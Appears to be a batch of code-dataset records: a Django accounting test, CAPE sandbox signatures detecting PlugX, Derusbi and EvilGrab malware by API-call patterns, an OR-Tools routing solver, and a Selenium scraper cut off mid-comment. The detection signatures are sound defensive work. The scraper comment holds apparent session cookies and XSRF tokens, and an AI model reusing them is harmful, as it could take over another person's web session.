data.update(matching_data)
response = self.client.post(reverse("sales:edit", kwargs={"pk": headers[0].pk}), data)
self.assertEqual(
response.status_code,
200
)
# INCORRECT USAGE
# Add another line this time
def test_new_line_marked_as_deleted_does_not_count(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": header.total * -1
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
last_line_form = line_forms[-1].copy()
last_line_form["id"] = ""
last_line_form["DELETE"] = "YEP"
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms.append(last_line_form)
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for tran in goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
for tran in vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
for tran in total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
# NOW CHECK THE EDITED
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
| [
"rossm6@googlemail.com"
] | rossm6@googlemail.com |
ee784fcf452c66c9190b9ade1e753cfa0f306994 | ada3899b0d2332121087105ceeba0b138681ecf2 | /modules/signatures/CAPE.py | 2642b2b5625d195eed0e7ad9e39bd475e10a6e4e | [] | no_license | olivierh59500/CAPE | 51d6a4e8b022b660ad8f64860459186f1d308987 | 823f78d22f444ee6db93e7b02c9fa77e64186baa | refs/heads/master | 2021-01-12T01:12:26.614946 | 2016-12-31T23:35:23 | 2016-12-31T23:35:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,171 | py | from lib.cuckoo.common.abstracts import Signature
# Minimum region size (0x2000 = 8 KiB) for an RWX allocation/protection to be
# treated as a payload-extraction candidate by ExtractionRWX below.
EXTRACTION_MIN_SIZE = 0x2000
class CAPE_PlugX(Signature):
    """Detect PlugX: a decompressed XV/MZ payload combined with a memcpy of a
    known PlugX configuration-block size.
    """
    name = "CAPE PlugX"
    description = "CAPE detection: PlugX"
    severity = 3
    categories = ["chinese", "malware"]
    families = ["plugx"]
    authors = ["kev"]
    minimum = "1.3"
    evented = True

    filter_apinames = set(["RtlDecompressBuffer", "memcpy"])

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)
        self.compressed_binary = False  # saw "XV"/"MZ" in a decompressed buffer
        self.config_copy = False        # saw a config-block-sized memcpy
        self.plugx = False              # final verdict

    def on_call(self, call, process):
        api = call["api"]
        if api == "RtlDecompressBuffer":
            # "XV" is the altered PlugX header marker, "MZ" a plain PE image.
            buf = self.get_argument(call, "UncompressedBuffer")
            if "XV" in buf or "MZ" in buf:
                self.compressed_binary = True
        elif api == "memcpy":
            # Sizes of PlugX configuration blocks seen across variants.
            known_config_sizes = (
                0xae4, 0xbe4, 0x150c, 0x1510, 0x1516, 0x170c, 0x1b18,
                0x1d18, 0x2540, 0x254c, 0x2d58, 0x36a4, 0x4ea4,
            )
            if self.get_raw_argument(call, "count") in known_config_sizes:
                self.config_copy = True

    def on_complete(self):
        # Both indicators are required for a positive match.
        if self.config_copy and self.compressed_binary:
            self.plugx = True
            return True
class CAPE_PlugX_fuzzy(Signature):
    """Looser PlugX detection: fires whenever an "XV"-marked buffer is
    decompressed, without requiring a config-sized memcpy.
    """
    name = "CAPE PlugX fuzzy"
    description = "CAPE detection: PlugX (fuzzy match)"
    severity = 3
    categories = ["chinese", "malware"]
    families = ["plugx"]
    authors = ["kev"]
    minimum = "1.3"
    evented = True

    filter_apinames = set(["RtlDecompressBuffer", "memcpy"])

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)
        self.compressed_binary = False
        self.config_copy = False
        self.plugx = False

    def on_call(self, call, process):
        if call["api"] != "RtlDecompressBuffer":
            return
        buf = self.get_argument(call, "UncompressedBuffer")
        if "XV" in buf:
            # The XV marker alone is enough for the fuzzy match.
            self.plugx = True
        if "MZ" in buf:
            self.compressed_binary = True

    def on_complete(self):
        # NOTE(review): config_copy is never set by on_call (memcpy is filtered
        # but not handled), so this branch is inert; kept for parity with
        # CAPE_PlugX.
        if self.config_copy and self.compressed_binary:
            self.plugx = True
        if self.plugx:
            return True
class CAPE_Compression(Signature):
    """Detect decompression of an embedded PE image (an "MZ" header appearing
    in an RtlDecompressBuffer output buffer).
    """
    name = "CAPE Compression"
    description = "CAPE detection: Compression"
    severity = 3
    categories = ["malware"]
    authors = ["kev"]
    minimum = "1.3"
    evented = True

    filter_apinames = set(["RtlDecompressBuffer"])

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)
        self.compressed_binary = False  # saw an MZ header in decompressed data

    def on_call(self, call, process):
        if call["api"] != "RtlDecompressBuffer":
            return
        if "MZ" in self.get_argument(call, "UncompressedBuffer"):
            self.compressed_binary = True

    def on_complete(self):
        if self.compressed_binary:
            return True
class CAPE_Derusbi(Signature):
    """Detect Derusbi via an srand call combined with a memcpy of a known
    Derusbi config size. Reporting is currently disabled (always returns
    False), matching the original implementation.
    """
    name = "CAPE Derusbi"
    description = "CAPE detection: Derusbi"
    severity = 3
    categories = ["chinese", "malware"]
    families = ["derusbi"]
    authors = ["kev"]
    minimum = "1.3"
    evented = True

    filter_apinames = set(["srand", "memcpy"])

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)
        self.srand = False        # PRNG seeded
        self.config_copy = False  # config-sized memcpy observed
        self.derusbi = False      # computed verdict (never reported)

    def on_call(self, call, process):
        api = call["api"]
        if api == "srand":
            self.srand = True
        elif api == "memcpy":
            # Known Derusbi configuration block sizes.
            if self.get_raw_argument(call, "count") in (0x50, 0x1A8, 0x2B4):
                self.config_copy = True

    def on_complete(self):
        if self.config_copy and self.srand:
            self.derusbi = True
            # Detection deliberately disabled in the original (the
            # "return True" was commented out); verdict is computed but
            # never reported.
        return False
class CAPE_EvilGrab(Signature):
    """Detect EvilGrab: creation of the Software\\rar registry key followed by
    a large (>64 KiB) binary value write, the malware's payload-staging
    pattern.
    """
    name = "CAPE EvilGrab"
    description = "CAPE detection: EvilGrab"
    severity = 3
    categories = ["malware"]
    authors = ["kev"]
    minimum = "1.3"
    evented = True

    filter_apinames = set(["RegSetValueExA", "RegSetValueExW", "RegCreateKeyExA", "RegCreateKeyExW"])

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)
        self.reg_evilgrab_keyname = False  # Software\rar key created
        self.reg_binary = False            # large value written under it

    def on_call(self, call, process):
        api = call["api"]
        if api in ("RegCreateKeyExA", "RegCreateKeyExW"):
            if self.get_argument(call, "SubKey") == "Software\\rar":
                self.reg_evilgrab_keyname = True
        elif api in ("RegSetValueExA", "RegSetValueExW"):
            # Only large writes after the marker key count.
            if self.reg_evilgrab_keyname and self.get_raw_argument(call, "BufferLength") > 0x10000:
                self.reg_binary = True

    def on_complete(self):
        return self.reg_binary
class ExtractionRWX(Signature):
    """Flag PAGE_EXECUTE_READWRITE memory in the current process.

    Fires when the sample allocates or re-protects a region of at least
    EXTRACTION_MIN_SIZE bytes with RWX protection in its own process
    (ProcessHandle 0xffffffff), a common precursor to unpacking.
    """
    name = "extraction_rwx"
    description = "CAPE detection: Extraction"
    severity = 1
    categories = ["allocation"]
    authors = ["Context"]
    minimum = "1.2"
    evented = True

    # BUG FIX: this was previously assigned to a LOCAL variable inside
    # __init__, so the API filter was never applied. Every sibling signature
    # declares it as a class attribute; do the same here.
    filter_apinames = set(["NtAllocateVirtualMemory", "NtProtectVirtualMemory", "VirtualProtectEx"])

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)

    # PAGE_EXECUTE_READWRITE = 0x00000040
    def on_call(self, call, process):
        # Each API spells the protection/size arguments differently.
        api = call["api"]
        if api == "NtAllocateVirtualMemory":
            prot_key, size_key = "Protection", "RegionSize"
        elif api == "VirtualProtectEx":
            prot_key, size_key = "Protection", "Size"
        elif api == "NtProtectVirtualMemory":
            prot_key, size_key = "NewAccessProtection", "NumberOfBytesProtected"
        else:
            return
        # Only the sample's own process (pseudo-handle 0xffffffff) with RWX
        # protection and a region big enough to hold a payload.
        if self.get_argument(call, "ProcessHandle") != "0xffffffff":
            return
        if self.get_argument(call, prot_key) != "0x00000040":  # PAGE_EXECUTE_READWRITE
            return
        if int(self.get_raw_argument(call, size_key), 0) >= EXTRACTION_MIN_SIZE:
            return True
| [
"kevoreilly@gmail.com"
] | kevoreilly@gmail.com |
3b7e31598de80dadbe58eefb86f5b22d9de2754d | 0c25196fc490ab8394a8e578f50bfd07670a54d0 | /partition/lib/ortool/vrp.py | 3119b4f6d9e8f1d5dd04df839a0c3297235433e6 | [] | no_license | xiaogaogaoxiao/MinMax-MTSP | 42b73f9a64ce9731e387dabc0f77e721571488ec | ae05e3d6666e01e15ecdfeb8bd1e2f2a5b8770ff | refs/heads/master | 2022-11-22T22:46:01.111180 | 2020-07-22T06:40:03 | 2020-07-22T06:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,285 | py | """Vehicles Routing Problem (VRP)."""
from __future__ import print_function
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
import torch
import multiprocessing
import time
import numpy as np
# Scale factor for arc costs: OR-Tools routing works on integer costs, so
# float distances are multiplied by C, truncated to int64, and divided back
# by C when reporting tour lengths.
C = 100000
# NOTE(review): not referenced in this portion of the module — presumably the
# worker count for a multiprocessing pool defined elsewhere; confirm.
const_process_num = 26
def Euclidean_distance(coords):
    """Return the pairwise Euclidean distance matrix, scaled to integers.

    Args:
        coords: 2-D float tensor of shape (n, d) — one row per city.

    Returns:
        (n, n) numpy int64 array of pairwise distances, each multiplied by
        the module constant C so OR-Tools can use them as integer arc costs.
        The diagonal is exactly zero.
    """
    # ||a - b||^2 = ||a||^2 + ||b||^2 - 2 a.b, computed for all pairs at once.
    sq_norms = torch.sum(coords ** 2, dim=1, keepdim=True)
    dist_sq = sq_norms + torch.transpose(sq_norms, 1, 0) \
        - 2 * torch.matmul(coords, torch.transpose(coords, 1, 0))
    # FIX: clamp tiny negative values caused by floating-point cancellation
    # (near-duplicate points); sqrt of those produced NaNs before.
    dist = torch.sqrt(torch.clamp(dist_sq, min=0.0))
    # Zero the diagonal exactly (replaces the original Python loop).
    dist.fill_diagonal_(0.0)
    dist = dist * C
    return dist.long().numpy()
def create_data_model(coords, anum):
    """Build the OR-Tools data dictionary for one VRP instance.

    Args:
        coords: (n, 2) tensor of city coordinates; node 0 is the depot.
        anum:   number of vehicles.

    Returns:
        dict with 'num_vehicles', 'depot' and the integer 'distance_matrix'.
    """
    dist = Euclidean_distance(coords)
    return {
        'num_vehicles': anum,
        'depot': 0,
        'distance_matrix': [list(row) for row in dist],
    }
def print_solution(data, manager, routing, solution):
    """Extract per-vehicle routes and route lengths from a solved model.

    (Console printing was already disabled in the original; this only
    collects results.)

    Returns:
        tourlen: (num_vehicles,) float tensor of route lengths, de-scaled
                 by the module constant C.
        tours:   list of node-index lists, one per vehicle, with the depot
                 at both ends.
    """
    num_vehicles = data['num_vehicles']
    tourlen = torch.zeros(num_vehicles)
    tours = []
    for vehicle_id in range(num_vehicles):
        route = []
        route_cost = 0
        index = routing.Start(vehicle_id)
        # Walk the linked route until the end sentinel.
        while not routing.IsEnd(index):
            route.append(manager.IndexToNode(index))
            previous_index = index
            index = solution.Value(routing.NextVar(index))
            route_cost += routing.GetArcCostForVehicle(previous_index, index, vehicle_id)
        route.append(manager.IndexToNode(index))
        tourlen[vehicle_id] = route_cost / C  # de-scale back to float distance
        tours.append(route)
    return tourlen, tours
def solve_instance_vrp(inputs):
    """Solve a single (min-max) VRP instance with the OR-Tools routing solver.

    Args:
        inputs: [coords, anum] or [coords, anum, time_limit] where coords is
            an (n, 2) tensor of city positions (node 0 is the depot), anum
            is the number of vehicles, and the optional third element is a
            wall-clock budget in seconds.

    Returns:
        [tourlen, tours] as produced by print_solution().
    """
    coords = inputs[0]
    anum = inputs[1]
    # Optional per-instance time budget; +1 rounds up so sub-second budgets
    # still give the solver at least one second. Default is 60s.
    # (Removed unused start_time / switch_timeLimit locals.)
    if len(inputs) > 2:
        timelimit = int(inputs[2]) + 1
    else:
        timelimit = 60
    data = create_data_model(coords, anum)
    # Routing index manager maps solver indices <-> distance-matrix nodes.
    manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']),
                                           data['num_vehicles'], data['depot'])
    routing = pywrapcp.RoutingModel(manager)

    def distance_callback(from_index, to_index):
        """Return the arc cost between two routing indices."""
        from_node = manager.IndexToNode(from_index)
        to_node = manager.IndexToNode(to_index)
        return data['distance_matrix'][from_node][to_node]

    transit_callback_index = routing.RegisterTransitCallback(distance_callback)
    routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
    # A distance dimension with a large global-span coefficient approximates
    # the min-max objective (minimize the longest single route).
    dimension_name = 'Distance'
    routing.AddDimension(
        transit_callback_index,
        0,  # no slack
        10000000,  # vehicle maximum travel distance (scaled units)
        True,  # start cumul to zero
        dimension_name)
    distance_dimension = routing.GetDimensionOrDie(dimension_name)
    distance_dimension.SetGlobalSpanCostCoefficient(100)
    search_parameters = pywrapcp.DefaultRoutingSearchParameters()
    search_parameters.time_limit.seconds = timelimit
    search_parameters.first_solution_strategy = (
        routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
    solution = routing.SolveWithParameters(search_parameters)
    # NOTE(review): solution is None if the solver finds nothing within the
    # limit; print_solution would then raise. Presumably instances are always
    # feasible — confirm.
    tourlen, tours = print_solution(data, manager, routing, solution)
    return [tourlen, tours]
def ortool_baseline_singleTrack(coords, anum):
    """Solve a batch of VRP instances sequentially (single process).

    Args:
        coords: (batch, n, 2) torch tensor of node coordinates.
        anum: number of vehicles per instance.

    Returns:
        (tourlen, tours): (batch, anum) tensor of route lengths on the
        input device, and a per-instance list of vehicle tours.
    """
    device = coords.device
    cpu_coords = coords.cpu()
    lengths = []
    all_tours = []
    for sample in cpu_coords:
        sample_len, sample_tours = solve_instance_vrp([sample, anum])
        lengths.append(sample_len)
        all_tours.append(sample_tours)
    return torch.stack(lengths, dim=0).to(device), all_tours
def orplanning_under_timeLimitation_singTrack(coords, anum, tusage):
    """Solve a batch of VRP instances with a per-instance time budget.

    Args:
        coords: (batch, n, 2) torch tensor of node coordinates.
        anum: number of vehicles per instance.
        tusage: solver time budget in seconds for each instance.

    Returns:
        (tourlen, tours): (batch, anum) tensor of route lengths on the
        input device, and a per-instance list of vehicle tours.
    """
    device = coords.device
    cpu_coords = coords.cpu()
    lengths = []
    all_tours = []
    for idx in range(cpu_coords.size(0)):
        length, tour = solve_instance_vrp([cpu_coords[idx], anum, tusage])
        lengths.append(length)
        all_tours.append(tour)
    return torch.stack(lengths, dim=0).to(device), all_tours
# def orplanning_under_inital_solution(coords, anum, tusage, initial_solution):
# device = coords.device
# coords = coords.cpu()
# batch_size = coords.size(0)
# pool = multiprocessing.Pool(processes=26)
# multi_inputs = []
# for b in range(batch_size):
# mptour = []
# for a in range(anum):
# # print(initial_solution[b][0][a][1:-1])
# atour = torch.tensor(initial_solution[b][0][a][1:-1]).long().cpu()
# atour = list(np.array(atour))
# mptour.append(atour)
# multi_inputs.append([coords[b], anum, tusage, mptour])
# result = pool.map(solve_vrp_with_inital_solution, multi_inputs)
# pool.close()
# tourlen = []
# duration = []
# for b in range(batch_size):
# tourlen.append(result[b][0])
# duration.append(result[b][1])
# tourlen = torch.stack(tourlen, dim=0)
# duration = torch.tensor(duration)
# return tourlen.to(device), duration.to(device)
def orplanning_under_inital_solution_singleTrack(coords, anum, tusage, initial_solution):
    """Re-optimise a batch of VRP instances, warm-starting from given tours.

    Args:
        coords: (batch, n, 2) torch tensor of node coordinates.
        anum: number of vehicles per instance.
        tusage: solver time budget in seconds for each instance.
        initial_solution: per-instance warm-start tours; entry [b][0][a] is
            the node sequence of vehicle `a` including the depot at both
            ends, which is stripped before handing the route to OR-Tools.

    Returns:
        (tourlen, tours): (batch, anum) tensor of route lengths on the
        input device, and a per-instance list of vehicle tours.
    """
    device = coords.device
    cpu_coords = coords.cpu()
    lengths = []
    all_tours = []
    for b in range(cpu_coords.size(0)):
        warm_routes = []
        for a in range(anum):
            # Drop the leading/trailing depot visit ([1:-1]) from each tour.
            route = torch.tensor(initial_solution[b][0][a][1:-1]).long().cpu()
            warm_routes.append(list(np.array(route)))
        length, tour = solve_vrp_with_inital_solution(
            [cpu_coords[b], anum, tusage, warm_routes])
        lengths.append(length)
        all_tours.append(tour)
    return torch.stack(lengths, dim=0).to(device), all_tours
def solve_vrp_with_inital_solution(inputs):
    """Solve one min-max VRP instance, warm-starting from given routes.

    Args:
        inputs: [coords, anum, time_limit_seconds, init_routes] where
            coords is an (n, 2) torch tensor, anum the vehicle count and
            init_routes a list (one entry per vehicle) of depot-free node
            index lists used as the initial assignment.

    Returns:
        [tourlen, tours] as produced by print_solution().

    Raises:
        RuntimeError: if the solver produces no solution. Previously this
            path fell through the `if solution:` guard and crashed with an
            UnboundLocalError on `tourlen` at the return statement.
    """
    coords = inputs[0]
    anum = inputs[1]
    timelimit = int(inputs[2])
    init_routes = inputs[3]
    # The unused `start_time`/`tusage` timing locals were removed.
    data = create_data_model(coords, anum)
    # Create the routing index manager and the routing model.
    manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']),
                                           data['num_vehicles'], data['depot'])
    routing = pywrapcp.RoutingModel(manager)

    def distance_callback(from_index, to_index):
        """Return the distance between two routing indices."""
        from_node = manager.IndexToNode(from_index)
        to_node = manager.IndexToNode(to_index)
        return data['distance_matrix'][from_node][to_node]

    transit_callback_index = routing.RegisterTransitCallback(distance_callback)
    # Define cost of each arc.
    routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
    # Distance dimension with a heavy global-span cost: the solver then
    # minimises the longest individual route (min-max objective).
    dimension_name = 'Distance'
    routing.AddDimension(
        transit_callback_index,
        0,          # no slack
        10000000,   # vehicle maximum travel distance
        True,       # start cumul at zero
        dimension_name)
    distance_dimension = routing.GetDimensionOrDie(dimension_name)
    distance_dimension.SetGlobalSpanCostCoefficient(100)
    # Seed the search with the provided routes.
    initial_solution = routing.ReadAssignmentFromRoutes(init_routes, True)
    search_parameters = pywrapcp.DefaultRoutingSearchParameters()
    search_parameters.time_limit.seconds = timelimit
    solution = routing.SolveFromAssignmentWithParameters(
        initial_solution, search_parameters)
    if not solution:
        raise RuntimeError(
            'OR-Tools found no VRP solution from the given initial routes')
    tourlen, tours = print_solution(data, manager, routing, solution)
    return [tourlen, tours]
| [
"noreply@github.com"
] | xiaogaogaoxiao.noreply@github.com |
01f60295b0772615b4e1dca648ecce9427677169 | 9fa1f5d9b8fd46e8383b9b7f599249831707deb1 | /DiyTrade20_2/Diy/Diy/spiders/spider_data.py | f0e23b29242da9443611a2898f51f8dfdae41179 | [] | no_license | kokohui/b2b_spider | fbf95351f6225677a33317cabca1e5d53d78a2ea | 3e4bb26075531f1e1bdd38b113561893efaaa9ed | refs/heads/master | 2020-07-21T02:50:14.514196 | 2019-09-06T08:11:26 | 2019-09-06T08:11:26 | 206,745,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,962 | py | # -*- coding: utf-8 -*-
import scrapy
import json
from scrapy import Request
from pyppeteer import launch
from selenium import webdriver
from selenium.webdriver import ChromeOptions
from time import sleep
class SpiderDataSpider(scrapy.Spider):
    """Drives a real Chrome session to search ralali.com for 'headset'.

    NOTE(review): the webdriver is created at class-definition time, so a
    Chrome window opens as soon as this module is imported. Consider moving
    it into __init__ (and quitting it in closed()) — left unchanged here to
    preserve the existing interface.
    """
    name = 'spider_data'
    option = ChromeOptions()
    # Hide the "Chrome is being controlled by automated software" banner.
    option.add_experimental_option('excludeSwitches', ['enable-automation'])
    bro = webdriver.Chrome(executable_path=r'D:\chromedriver', chrome_options=option)

    def start_requests(self):
        """Open the home page, switch language, then submit the search form."""
        url = 'https://www.ralali.com/'
        bro = self.bro
        bro.get(url=url)
        bro.find_element_by_class_name("dropdown-toggle").click()
        sleep(1)
        bro.find_element_by_link_text("Bahasa Indonesia").click()
        sleep(1)
        bro.find_element_by_xpath("/html/body/header/section/div[2]/div/div[4]/div/form/div/input").send_keys('headset')
        sleep(1)
        # BUG FIX: find_element_by_class_name cannot take a compound class
        # string ("btn btnSearchHome" raises an invalid-selector error);
        # use a CSS selector matching both classes instead.
        bro.find_element_by_css_selector(".btn.btnSearchHome").click()
# def parse(self, response):
# res_text_json = response.text
# res_text_data = json.loads(res_text_json)
# # print(res_text_data, type(res_text_data))
# hits_list = res_text_data.get("hits").get("hits")[0]
# print(hits_list)
# # for hits in hits_list:
# res_url = hits_list.get("_source").get("alias")
# res_url = "https://www.ralali.com/v/rantchromegarage/product/" + res_url
# headers = {
# 'cookie': 'rll_grnt=7b82376c43f74900d225fdab213ab177115e78e5-10433ecc8ed7b42bef9da37454fc81ed_fcc763d11eec41950913c6e7c28eec59; _ga=GA1.2.848148245.1567129123; _gid=GA1.2.1836881632.1567129123; cto_lwid=e661febf-cb6a-41ab-beab-c551b854542e; dayOfYear=242; show_top_banner=1; _hjid=a0226024-f4ac-4f90-a629-7aef4f7b056d; _gat_UA-42713825-6=1; previous_url=eyJpdiI6Imx3c0lrWHV1UUlwOStZaGNGbUN1bmc9PSIsInZhbHVlIjoiWXRVY1JZVkZ0Ynl1ZU5wWXRWYWZjS2hOSFZ5Q1FHaWNMMUpNQXo2aEkzXC9JMStMWk5OOGY2cEwrM29aVkNodDB0YWNZSlU5cmMzRGpyV3Y1UUZxYXRWRGR2QVc5bDN3VHVcL3hFWWlpV2tzT2J1dFNhaXVkQ1dDb3hnMWpJQW8yZyIsIm1hYyI6ImRkZTIzODY1MmNmYmE5OWEwZTdjYmNhNjFkNDI4OTM2MDk5YjEzZmIwMWJmZjgzMDRjZDNiMDhhN2M1NzU0NjAifQ%3D%3D; XSRF-TOKEN=eyJpdiI6IjJQVHZKUWx1bFFpZnd5K3JTQXFSMkE9PSIsInZhbHVlIjoiUTRZR2M3XC9jOUFNV0swaGFWNkx0eUFRM2lHRzI0OHZMQWJFVG5LTWdJVHhQNmNVdlNNNHlKVkFQWHROM0R1UnBXblwva1FWVkhMRkZKVU9jWUZDa1NnUT09IiwibWFjIjoiZWYzZTBmMDQzMGJmOGQzNTg0YjBkMDE0M2U4NjcyNTc5ZDM4N2VlZjdjMThhNWQwNDFmYjk5OTkyOGEyODY1OSJ9; ralali=eyJpdiI6Imx2REhQYmlyaUFrTHppbGM0RVBuNEE9PSIsInZhbHVlIjoibFRITTk4eTlBSlwveEx1Y01zalFZaVV5UFdUenhKd2RBNW1JK3doWUkrUkNNRHl2TWpjRkNKbkw1VDU5bUhlU3I3aDNJNlwvQ0ZpMHcwV1NIZEZkTVZVZz09IiwibWFjIjoiNWU2ZDIxYTA3MGRmNWJkYWMyZjIxMWQxYTNkNmNhZjE5ZGY0NDk0MGVkMjI3YThjMWRjMmY3NDBkNGU4YTkxOCJ9; 